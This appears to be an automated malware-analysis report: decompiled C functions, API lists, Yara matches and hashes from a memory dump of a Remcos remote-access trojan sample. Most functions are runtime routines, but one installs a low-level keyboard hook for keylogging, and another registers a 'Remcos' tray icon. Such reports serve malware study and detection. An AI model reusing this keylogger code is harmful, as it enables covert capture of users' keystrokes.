                              				intOrPtr _v40;
                              				void* _v44;
                              				signed int _v48;
                              				signed char* _v52;
                              				long _v56;
                              				int _v60;
                              				signed int _t78;
                              				signed int _t80;
                              				int _t86;
                              				void* _t94;
                              				long _t97;
                              				void _t105;
                              				void* _t112;
                              				signed int _t116;
                              				signed int _t118;
                              				signed char _t123;
                              				signed char _t128;
                              				intOrPtr _t129;
                              				signed int _t131;
                              				signed char* _t133;
                              				intOrPtr* _t135;
                              				signed int _t136;
                              				void* _t137;
                              
                              				_t78 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t78 ^ _t136;
                              				_t80 = _a8;
                              				_t118 = _t80 >> 6;
                              				_t116 = (_t80 & 0x0000003f) * 0x30;
                              				_t133 = _a12;
                              				_v52 = _t133;
                              				_v48 = _t118;
                              				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
                              				_v40 = _a16 + _t133;
                              				_t86 = GetConsoleCP();
                              				_t135 = _a4;
                              				_v60 = _t86;
                              				 *_t135 = 0;
                              				 *((intOrPtr*)(_t135 + 4)) = 0;
                              				 *((intOrPtr*)(_t135 + 8)) = 0;
                              				while(_t133 < _v40) {
                              					_v28 = 0;
                              					_v31 =  *_t133;
                              					_t129 =  *((intOrPtr*)(0x46b800 + _v48 * 4));
                              					_t123 =  *(_t129 + _t116 + 0x2d);
                              					if((_t123 & 0x00000004) == 0) {
                              						if(( *(E0043E036(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                              							_push(1);
                              							_push(_t133);
                              							goto L8;
                              						} else {
                              							if(_t133 >= _v40) {
                              								_t131 = _v48;
                              								 *((char*)( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                              								 *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                              								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                              							} else {
                              								_t112 = E004422AE( &_v28, _t133, 2);
                              								_t137 = _t137 + 0xc;
                              								if(_t112 != 0xffffffff) {
                              									_t133 =  &(_t133[1]);
                              									goto L9;
                              								}
                              							}
                              						}
                              					} else {
                              						_t128 = _t123 & 0x000000fb;
                              						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                              						_push(2);
                              						_v15 = _t128;
                              						 *(_t129 + _t116 + 0x2d) = _t128;
                              						_push( &_v16);
                              						L8:
                              						_push( &_v28);
                              						_t94 = E004422AE();
                              						_t137 = _t137 + 0xc;
                              						if(_t94 != 0xffffffff) {
                              							L9:
                              							_t133 =  &(_t133[1]);
                              							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                              							_v56 = _t97;
                              							if(_t97 != 0) {
                              								_t45 =  &_v36; // 0x443f61
                              								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
                              									L19:
                              									 *_t135 = GetLastError();
                              								} else {
                              									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                              									if(_v36 >= _v56) {
                              										if(_v31 != 0xa) {
                              											goto L16;
                              										} else {
                              											_t105 = 0xd;
                              											_v32 = _t105;
                              											_t55 =  &_v36; // 0x443f61
                              											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
                              												goto L19;
                              											} else {
                              												if(_v36 >= 1) {
                              													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                              													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                              													goto L16;
                              												}
                              											}
                              										}
                              									}
                              								}
                              							}
                              						}
                              					}
                              					goto L20;
                              					L16:
                              				}
                              				L20:
                              				return E0042F61B(_v8 ^ _t136);
                              			}

                              APIs
                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00443F61,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044382E
                              • __fassign.LIBCMT ref: 004438A9
                              • __fassign.LIBCMT ref: 004438C4
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 004438EA
                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,a?D,00000000,?,?,?,?,?,?,?,?,?,00443F61,?), ref: 00443909
                              • WriteFile.KERNEL32(?,?,00000001,a?D,00000000,?,?,?,?,?,?,?,?,?,00443F61,?), ref: 00443942
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                              • String ID: a?D
                              • API String ID: 1324828854-2671499184
                              • Opcode ID: 66d6eff364102b284a7c0bc5fdcf6333283dc1297cb1b8055ba140da389d8a51
                              • Instruction ID: 2257eea9d661a44ad8950c31b3f1cc9a1c274aacc0cefe8ff3c2634c143855f4
                              • Opcode Fuzzy Hash: 66d6eff364102b284a7c0bc5fdcf6333283dc1297cb1b8055ba140da389d8a51
                              • Instruction Fuzzy Hash: 2951D0B0A006099FDB14CFA8D881AEEFBF8EF09701F14406BE941E7251E3749A45CF69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E00408894(struct HHOOK__** __ecx) {
                              				struct tagMSG _v32;
                              				char _v60;
                              				void* _v64;
                              				void* __edi;
                              				int _t7;
                              				void* _t8;
                              				struct HHOOK__* _t14;
                              				void* _t16;
                              				void* _t22;
                              				struct HHOOK__** _t34;
                              				signed int _t36;
                              				void* _t38;
                              
                              				_t38 = (_t36 & 0xfffffff8) - 0x38;
                              				_t34 = __ecx;
                              				 *0x46baf0 = __ecx;
                              				if( *((intOrPtr*)(__ecx)) != 0) {
                              					goto L3;
                              				} else {
                              					_t14 = SetWindowsHookExA(0xd, E0040887D, GetModuleHandleA(0), 0); // 0xd == WH_KEYBOARD_LL; E0040887D is the hook procedure; dwThreadId 0 = all threads on the desktop
                              					 *_t34 = _t14;
                              					_t43 = _t14;
                              					if(_t14 != 0) {
                              						while(1) {
                              							L3:
                              							_t7 = GetMessageA( &_v32, 0, 0, 0); // message pump: a low-level hook only receives keystrokes while the installing thread dispatches messages
                              							__eflags = _t7;
                              							if(_t7 == 0) {
                              								break;
                              							}
                              							TranslateMessage( &_v32);
                              							DispatchMessageA( &_v32);
                              							__eflags =  *_t34;
                              							if( *_t34 != 0) {
                              								continue;
                              							}
                              							break;
                              						}
                              						_t8 = 0;
                              						__eflags = 0;
                              					} else {
                              						_t16 = L00416B7E(_t22,  &_v60, GetLastError());
                              						_t39 = _t38 - 0x18;
                              						E004075C4(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
                              						E00402064(_t22, _t39 - 0x14, "[ERROR]");
                              						E004165D8(_t22, 0);
                              						L00401FA7();
                              						_t8 = 1;
                              					}
                              				}
                              				return _t8;
                              			}

                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AF
                              • SetWindowsHookExA.USER32 ref: 004088BD
                              • GetLastError.KERNEL32 ref: 004088C9
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • GetMessageA.USER32 ref: 00408917
                              • TranslateMessage.USER32(?), ref: 00408926
                              • DispatchMessageA.USER32 ref: 00408931
                              Strings
                              • [ERROR], xrefs: 004088EF
                              • Keylogger initialization failure: error , xrefs: 004088DD
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                              • String ID: Keylogger initialization failure: error $[ERROR]
                              • API String ID: 3219506041-2451335947
                              • Opcode ID: 18efa55e4c0aa19a37e2247e024f1a1e12fd5720c569a994fc46527ab49f1f09
                              • Instruction ID: 45d1f3c5768472935d8da96a5f04b23d1a91758f3c86bb8fdf5143b2996172c8
                              • Opcode Fuzzy Hash: 18efa55e4c0aa19a37e2247e024f1a1e12fd5720c569a994fc46527ab49f1f09
                              • Instruction Fuzzy Hash: 8F119DB25002016BC7207BB69D09C6B77ACEA95752B50053EB885D2191EF38DA04C6AA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00418680(void* __eflags) {
                              				struct tagMSG _v32;
                              				char _v300;
                              				int _t14;
                              
                              				GetModuleFileNameA(0,  &_v300, 0x104);
                              				 *0x46bec4 = E00418732();
                              				0x46bec0->cbSize = 0x1fc;
                              				 *0x46bec8 = 1;
                              				 *0x46bed0 = 0x401;
                              				 *0x46bed4 = ExtractIconA(0,  &_v300, 0);
                              				lstrcpynA(0x46bed8, "Remcos", 0x80);
                              				 *0x46becc = 7;
                              				Shell_NotifyIconA(0, 0x46bec0);
                              				while(1) {
                              					_t14 = GetMessageA( &_v32, 0, 0, 0);
                              					if(_t14 == 0) {
                              						break;
                              					}
                              					TranslateMessage( &_v32);
                              					DispatchMessageA( &_v32);
                              				}
                              				return _t14;
                              			}
                              0x00418699
                              0x004186a4
                              0x004186b2
                              0x004186bc
                              0x004186c6
                              0x004186e5
                              0x004186ea
                              0x004186f6
                              0x00418700
                              0x0041871c
                              0x00418723
                              0x0041872b
                              0x00000000
                              0x00000000
                              0x0041870c
                              0x00418716
                              0x00418716
                              0x00418731

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418699
                                • Part of subcall function 00418732: RegisterClassExA.USER32(00000030), ref: 0041877E
                                • Part of subcall function 00418732: CreateWindowExA.USER32 ref: 00418799
                                • Part of subcall function 00418732: GetLastError.KERNEL32 ref: 004187A3
                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 004186D0
                              • lstrcpynA.KERNEL32(0046BED8,Remcos,00000080), ref: 004186EA
                              • Shell_NotifyIconA.SHELL32(00000000,0046BEC0), ref: 00418700
                              • TranslateMessage.USER32(?), ref: 0041870C
                              • DispatchMessageA.USER32 ref: 00418716
                              • GetMessageA.USER32 ref: 00418723
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                              • String ID: Remcos
                              • API String ID: 1970332568-165870891
                              • Opcode ID: f64222c40e49cda82ce2febada2467d24727ed5b3ff0689c3ecc630936eb6d21
                              • Instruction ID: 76f610ea089cdd7666bb47ab7eed5b25d2d074ad51cd5b102639d92569b498d2
                              • Opcode Fuzzy Hash: f64222c40e49cda82ce2febada2467d24727ed5b3ff0689c3ecc630936eb6d21
                              • Instruction Fuzzy Hash: 98011EB1900308ABD7109FA1EC0CEDA7BBCFB85747F10006AF615D2161EBF995858B9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E004450E7(signed int _a4, void* _a8, unsigned int _a12) {
                              				signed int _v5;
                              				char _v6;
                              				void* _v12;
                              				unsigned int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				void* _v32;
                              				long _v36;
                              				void* _v40;
                              				long _v44;
                              				signed int* _t143;
                              				signed int _t145;
                              				intOrPtr _t149;
                              				signed int _t153;
                              				signed int _t155;
                              				signed char _t157;
                              				unsigned int _t158;
                              				intOrPtr _t162;
                              				void* _t163;
                              				signed int _t164;
                              				signed int _t167;
                              				long _t168;
                              				intOrPtr _t175;
                              				signed int _t176;
                              				intOrPtr _t178;
                              				signed int _t180;
                              				signed int _t184;
                              				char _t191;
                              				char* _t192;
                              				char _t199;
                              				char* _t200;
                              				signed char _t211;
                              				signed int _t213;
                              				long _t215;
                              				signed int _t216;
                              				char _t218;
                              				signed char _t222;
                              				signed int _t223;
                              				unsigned int _t224;
                              				intOrPtr _t225;
                              				unsigned int _t229;
                              				signed int _t231;
                              				signed int _t232;
                              				signed int _t233;
                              				signed int _t234;
                              				signed int _t235;
                              				signed char _t236;
                              				signed int _t237;
                              				signed int _t239;
                              				signed int _t240;
                              				signed int _t241;
                              				signed int _t242;
                              				signed int _t246;
                              				void* _t248;
                              				void* _t249;
                              
                              				_t213 = _a4;
                              				if(_t213 != 0xfffffffe) {
                              					__eflags = _t213;
                              					if(_t213 < 0) {
                              						L58:
                              						_t143 = L00439E01();
                              						 *_t143 =  *_t143 & 0x00000000;
                              						__eflags =  *_t143;
                              						 *((intOrPtr*)(L00439E14())) = 9;
                              						L59:
                              						_t145 = E0043626D();
                              						goto L60;
                              					}
                              					__eflags = _t213 -  *0x46ba00; // 0x40
                              					if(__eflags >= 0) {
                              						goto L58;
                              					}
                              					_v24 = 1;
                              					_t239 = _t213 >> 6;
                              					_t235 = (_t213 & 0x0000003f) * 0x30;
                              					_v20 = _t239;
                              					_t149 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
                              					_v28 = _t235;
                              					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                              					_v5 = _t222;
                              					__eflags = _t222 & 0x00000001;
                              					if((_t222 & 0x00000001) == 0) {
                              						goto L58;
                              					}
                              					_t223 = _a12;
                              					__eflags = _t223 - 0x7fffffff;
                              					if(_t223 <= 0x7fffffff) {
                              						__eflags = _t223;
                              						if(_t223 == 0) {
                              							L57:
                              							return 0;
                              						}
                              						__eflags = _v5 & 0x00000002;
                              						if((_v5 & 0x00000002) != 0) {
                              							goto L57;
                              						}
                              						__eflags = _a8;
                              						if(_a8 == 0) {
                              							goto L6;
                              						}
                              						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                              						_v5 = _t153;
                              						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                              						_t246 = 0;
                              						_t155 = _t153 - 1;
                              						__eflags = _t155;
                              						if(_t155 == 0) {
                              							_t236 = _v24;
                              							_t157 =  !_t223;
                              							__eflags = _t236 & _t157;
                              							if((_t236 & _t157) != 0) {
                              								_t158 = 4;
                              								_t224 = _t223 >> 1;
                              								_v16 = _t158;
                              								__eflags = _t224 - _t158;
                              								if(_t224 >= _t158) {
                              									_t158 = _t224;
                              									_v16 = _t224;
                              								}
                              								_t246 = E0043E61D(_t224, _t158);
                              								L0043EE85(0);
                              								L0043EE85(0);
                              								_t249 = _t248 + 0xc;
                              								_v12 = _t246;
                              								__eflags = _t246;
                              								if(_t246 != 0) {
                              									_t162 = E0044471C(_t213, 0, 0, _v24);
                              									_t225 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
                              									_t248 = _t249 + 0x10;
                              									_t240 = _v28;
                              									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                              									_t163 = _t246;
                              									 *(_t240 + _t225 + 0x24) = _t236;
                              									_t235 = _t240;
                              									_t223 = _v16;
                              									L21:
                              									_t241 = 0;
                              									_v40 = _t163;
                              									_t215 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
                              									_v36 = _t215;
                              									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                              									_t216 = _a4;
                              									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                              										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                              										_v6 = _t218;
                              										__eflags = _t218 - 0xa;
                              										_t216 = _a4;
                              										if(_t218 != 0xa) {
                              											__eflags = _t223;
                              											if(_t223 != 0) {
                              												_t241 = _v24;
                              												 *_t163 = _v6;
                              												_t216 = _a4;
                              												_t232 = _t223 - 1;
                              												__eflags = _v5;
                              												_v12 = _t163 + 1;
                              												_v16 = _t232;
                              												 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2a)) = 0xa;
                              												if(_v5 != 0) {
                              													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b));
                              													_v6 = _t191;
                              													__eflags = _t191 - 0xa;
                              													if(_t191 != 0xa) {
                              														__eflags = _t232;
                              														if(_t232 != 0) {
                              															_t192 = _v12;
                              															_t241 = 2;
                              															 *_t192 = _v6;
                              															_t216 = _a4;
                              															_t233 = _t232 - 1;
                              															_v12 = _t192 + 1;
                              															_v16 = _t233;
                              															 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b)) = 0xa;
                              															__eflags = _v5 - _v24;
                              															if(_v5 == _v24) {
                              																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c));
                              																_v6 = _t199;
                              																__eflags = _t199 - 0xa;
                              																if(_t199 != 0xa) {
                              																	__eflags = _t233;
                              																	if(_t233 != 0) {
                              																		_t200 = _v12;
                              																		_t241 = 3;
                              																		 *_t200 = _v6;
                              																		_t216 = _a4;
                              																		_t234 = _t233 - 1;
                              																		__eflags = _t234;
                              																		_v12 = _t200 + 1;
                              																		_v16 = _t234;
                              																		 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c)) = 0xa;
                              																	}
                              																}
                              															}
                              														}
                              													}
                              												}
                              											}
                              										}
                              									}
                              									_t164 = E0044D987(_t216);
                              									__eflags = _t164;
                              									if(_t164 == 0) {
                              										L41:
                              										_v24 = 0;
                              										L42:
                              										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                              										__eflags = _t167;
                              										if(_t167 == 0) {
                              											L53:
                              											_t168 = GetLastError();
                              											_t241 = 5;
                              											__eflags = _t168 - _t241;
                              											if(_t168 != _t241) {
                              												__eflags = _t168 - 0x6d;
                              												if(_t168 != 0x6d) {
                              													L37:
                              													L00439DDE(_t168);
                              													goto L38;
                              												}
                              												_t242 = 0;
                              												goto L39;
                              											}
                              											 *((intOrPtr*)(L00439E14())) = 9;
                              											 *(L00439E01()) = _t241;
                              											goto L38;
                              										}
                              										_t229 = _a12;
                              										__eflags = _v36 - _t229;
                              										if(_v36 > _t229) {
                              											goto L53;
                              										}
                              										_t242 = _t241 + _v36;
                              										__eflags = _t242;
                              										L45:
                              										_t237 = _v28;
                              										_t175 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
                              										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                              										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                              											__eflags = _v5 - 2;
                              											if(_v5 == 2) {
                              												__eflags = _v24;
                              												_push(_t242 >> 1);
                              												_push(_v40);
                              												_push(_t216);
                              												if(_v24 == 0) {
                              													_t176 = L00444C43();
                              												} else {
                              													_t176 = L00444F53();
                              												}
                              											} else {
                              												_t230 = _t229 >> 1;
                              												__eflags = _t229 >> 1;
                              												_t176 = L00444E03(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                              											}
                              											_t242 = _t176;
                              										}
                              										goto L39;
                              									}
                              									_t231 = _v28;
                              									_t178 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
                              									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                              									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                              										goto L41;
                              									}
                              									_t180 = GetConsoleMode(_v32,  &_v44);
                              									__eflags = _t180;
                              									if(_t180 == 0) {
                              										goto L41;
                              									}
                              									__eflags = _v5 - 2;
                              									if(_v5 != 2) {
                              										goto L42;
                              									}
                              									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                              									__eflags = _t184;
                              									if(_t184 != 0) {
                              										_t229 = _a12;
                              										_t242 = _t241 + _v36 * 2;
                              										goto L45;
                              									}
                              									_t168 = GetLastError();
                              									goto L37;
                              								} else {
                              									 *((intOrPtr*)(L00439E14())) = 0xc;
                              									 *(L00439E01()) = 8;
                              									L38:
                              									_t242 = _t241 | 0xffffffff;
                              									__eflags = _t242;
                              									L39:
                              									L0043EE85(_t246);
                              									return _t242;
                              								}
                              							}
                              							L15:
                              							 *(L00439E01()) =  *_t206 & _t246;
                              							 *((intOrPtr*)(L00439E14())) = 0x16;
                              							E0043626D();
                              							goto L38;
                              						}
                              						__eflags = _t155 != 1;
                              						if(_t155 != 1) {
                              							L13:
                              							_t163 = _a8;
                              							_v16 = _t223;
                              							_v12 = _t163;
                              							goto L21;
                              						}
                              						_t211 =  !_t223;
                              						__eflags = _t211 & 0x00000001;
                              						if((_t211 & 0x00000001) == 0) {
                              							goto L15;
                              						}
                              						goto L13;
                              					}
                              					L6:
                              					 *(L00439E01()) =  *_t151 & 0x00000000;
                              					 *((intOrPtr*)(L00439E14())) = 0x16;
                              					goto L59;
                              				} else {
                              					 *(L00439E01()) =  *_t212 & 0x00000000;
                              					_t145 = L00439E14();
                              					 *_t145 = 9;
                              					L60:
                              					return _t145 | 0xffffffff;
                              				}
                              			}
                              0x004450f0
                              0x004450f7
                              0x00445111
                              0x00445113
                              0x0044547b
                              0x0044547b
                              0x00445480
                              0x00445480
                              0x00445488
                              0x0044548e
                              0x0044548e
                              0x00000000
                              0x0044548e
                              0x00445119
                              0x0044511f
                              0x00000000
                              0x00000000
                              0x00445127
                              0x00445133
                              0x00445136
                              0x00445139
                              0x0044513c
                              0x00445143
                              0x00445146
                              0x0044514a
                              0x0044514d
                              0x00445150
                              0x00000000
                              0x00000000
                              0x00445156
                              0x00445159
                              0x0044515f
                              0x00445179
                              0x0044517b
                              0x00445477
                              0x00000000
                              0x00445477
                              0x00445181
                              0x00445185
                              0x00000000
                              0x00000000
                              0x0044518b
                              0x0044518f
                              0x00000000
                              0x00000000
                              0x00445196
                              0x0044519a
                              0x0044519d
                              0x004451a0
                              0x004451a5
                              0x004451a5
                              0x004451a8
                              0x004451c5
                              0x004451ca
                              0x004451cc
                              0x004451ce
                              0x004451ee
                              0x004451ef
                              0x004451f1
                              0x004451f4
                              0x004451f6
                              0x004451f8
                              0x004451fa
                              0x004451fa
                              0x00445205
                              0x00445207
                              0x0044520e
                              0x00445213
                              0x00445216
                              0x00445219
                              0x0044521b
                              0x00445240
                              0x00445245
                              0x0044524c
                              0x0044524f
                              0x00445252
                              0x00445256
                              0x00445258
                              0x0044525c
                              0x0044525e
                              0x00445261
                              0x00445264
                              0x00445266
                              0x00445269
                              0x00445270
                              0x00445273
                              0x00445278
                              0x0044527b
                              0x00445284
                              0x00445288
                              0x0044528b
                              0x0044528e
                              0x00445291
                              0x00445297
                              0x00445299
                              0x004452a2
                              0x004452a5
                              0x004452a8
                              0x004452ab
                              0x004452ac
                              0x004452b0
                              0x004452b6
                              0x004452c0
                              0x004452c5
                              0x004452d5
                              0x004452d9
                              0x004452dc
                              0x004452de
                              0x004452e0
                              0x004452e2
                              0x004452e4
                              0x004452ec
                              0x004452ed
                              0x004452f0
                              0x004452f3
                              0x004452f4
                              0x004452fa
                              0x00445304
                              0x0044530c
                              0x0044530f
                              0x0044531b
                              0x0044531f
                              0x00445322
                              0x00445324
                              0x00445326
                              0x00445328
                              0x0044532a
                              0x00445332
                              0x00445333
                              0x00445336
                              0x00445339
                              0x00445339
                              0x0044533a
                              0x00445340
                              0x0044534a
                              0x0044534a
                              0x00445328
                              0x00445324
                              0x0044530f
                              0x004452e2
                              0x004452de
                              0x004452c5
                              0x00445299
                              0x00445291
                              0x00445350
                              0x00445356
                              0x00445358
                              0x004453cb
                              0x004453cb
                              0x004453cf
                              0x004453df
                              0x004453e5
                              0x004453e7
                              0x00445443
                              0x00445443
                              0x0044544b
                              0x0044544c
                              0x0044544e
                              0x00445467
                              0x0044546a
                              0x004453a7
                              0x004453a8
                              0x00000000
                              0x004453ad
                              0x00445470
                              0x00000000
                              0x00445470
                              0x00445455
                              0x00445460
                              0x00000000
                              0x00445460
                              0x004453e9
                              0x004453ec
                              0x004453ef
                              0x00000000
                              0x00000000
                              0x004453f1
                              0x004453f1
                              0x004453f4
                              0x004453f7
                              0x004453fa
                              0x00445401
                              0x00445406
                              0x00445408
                              0x0044540c
                              0x00445427
                              0x0044542b
                              0x0044542c
                              0x0044542f
                              0x00445430
                              0x0044543c
                              0x00445432
                              0x00445432
                              0x00445432
                              0x0044540e
                              0x0044540e
                              0x0044540e
                              0x00445419
                              0x0044541e
                              0x00445421
                              0x00445421
                              0x00000000
                              0x00445406
                              0x0044535d
                              0x00445360
                              0x00445367
                              0x0044536c
                              0x00000000
                              0x00000000
                              0x00445375
                              0x0044537b
                              0x0044537d
                              0x00000000
                              0x00000000
                              0x0044537f
                              0x00445383
                              0x00000000
                              0x00000000
                              0x00445397
                              0x0044539d
                              0x0044539f
                              0x004453c3
                              0x004453c6
                              0x00000000
                              0x004453c6
                              0x004453a1
                              0x00000000
                              0x0044521d
                              0x00445222
                              0x0044522d
                              0x004453ae
                              0x004453ae
                              0x004453ae
                              0x004453b1
                              0x004453b2
                              0x00000000
                              0x004453ba
                              0x0044521b
                              0x004451d0
                              0x004451d5
                              0x004451dc
                              0x004451e2
                              0x00000000
                              0x004451e2
                              0x004451aa
                              0x004451ad
                              0x004451b7
                              0x004451b7
                              0x004451ba
                              0x004451bd
                              0x00000000
                              0x004451bd
                              0x004451b1
                              0x004451b3
                              0x004451b5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004451b5
                              0x00445161
                              0x00445166
                              0x0044516e
                              0x00000000
                              0x004450f9
                              0x004450fe
                              0x00445101
                              0x00445106
                              0x00445493
                              0x00000000
                              0x00445493

                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d9bd4cba7261bb85346107ed43908dd6911e5a0a1b87e865910dd67f9eedc0de
                              • Instruction ID: d415aa42f168db04541a2b881a195995a4068d2056edb743f6be97fc2ac4bfb3
                              • Opcode Fuzzy Hash: d9bd4cba7261bb85346107ed43908dd6911e5a0a1b87e865910dd67f9eedc0de
                              • Instruction Fuzzy Hash: A1C10971D04749AFEF11DFA9C841BAEBBB4AF09304F18009AE8149B393D7789D41CB69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E0044DA45(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                              				signed int _v8;
                              				char _v22;
                              				struct _cpinfo _v28;
                              				short* _v32;
                              				int _v36;
                              				char* _v40;
                              				int _v44;
                              				intOrPtr _v48;
                              				void* _v60;
                              				signed int _t63;
                              				int _t70;
                              				signed int _t72;
                              				short* _t73;
                              				signed int _t77;
                              				short* _t87;
                              				void* _t89;
                              				void* _t92;
                              				int _t99;
                              				intOrPtr _t101;
                              				intOrPtr _t102;
                              				signed int _t112;
                              				char* _t114;
                              				char* _t115;
                              				void* _t120;
                              				void* _t121;
                              				intOrPtr _t122;
                              				intOrPtr _t123;
                              				intOrPtr* _t125;
                              				short* _t126;
                              				int _t128;
                              				int _t129;
                              				short* _t130;
                              				intOrPtr* _t131;
                              				signed int _t132;
                              				short* _t133;
                              
                              				_t63 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t63 ^ _t132;
                              				_t128 = _a20;
                              				_v44 = _a4;
                              				_v48 = _a8;
                              				_t67 = _a24;
                              				_v40 = _a24;
                              				_t125 = _a16;
                              				_v36 = _t125;
                              				if(_t128 <= 0) {
                              					if(_t128 >= 0xffffffff) {
                              						goto L2;
                              					} else {
                              						goto L5;
                              					}
                              				} else {
                              					_t128 = L0043EE69(_t125, _t128);
                              					_t67 = _v40;
                              					L2:
                              					_t99 = _a28;
                              					if(_t99 <= 0) {
                              						if(_t99 < 0xffffffff) {
                              							goto L5;
                              						} else {
                              							goto L7;
                              						}
                              					} else {
                              						_t99 = L0043EE69(_t67, _t99);
                              						L7:
                              						_t70 = _a32;
                              						if(_t70 == 0) {
                              							_t70 =  *( *_v44 + 8);
                              							_a32 = _t70;
                              						}
                              						if(_t128 == 0 || _t99 == 0) {
                              							if(_t128 != _t99) {
                              								if(_t99 <= 1) {
                              									if(_t128 <= 1) {
                              										if(GetCPInfo(_t70,  &_v28) == 0) {
                              											goto L5;
                              										} else {
                              											if(_t128 <= 0) {
                              												if(_t99 <= 0) {
                              													goto L36;
                              												} else {
                              													_t89 = 2;
                              													if(_v28 >= _t89) {
                              														_t114 =  &_v22;
                              														if(_v22 != 0) {
                              															_t131 = _v40;
                              															while(1) {
                              																_t122 =  *((intOrPtr*)(_t114 + 1));
                              																if(_t122 == 0) {
                              																	goto L15;
                              																}
                              																_t101 =  *_t131;
                              																if(_t101 <  *_t114 || _t101 > _t122) {
                              																	_t114 = _t114 + _t89;
                              																	if( *_t114 != 0) {
                              																		continue;
                              																	} else {
                              																		goto L15;
                              																	}
                              																}
                              																goto L63;
                              															}
                              														}
                              													}
                              													goto L15;
                              												}
                              											} else {
                              												_t92 = 2;
                              												if(_v28 >= _t92) {
                              													_t115 =  &_v22;
                              													if(_v22 != 0) {
                              														while(1) {
                              															_t123 =  *((intOrPtr*)(_t115 + 1));
                              															if(_t123 == 0) {
                              																goto L17;
                              															}
                              															_t102 =  *_t125;
                              															if(_t102 <  *_t115 || _t102 > _t123) {
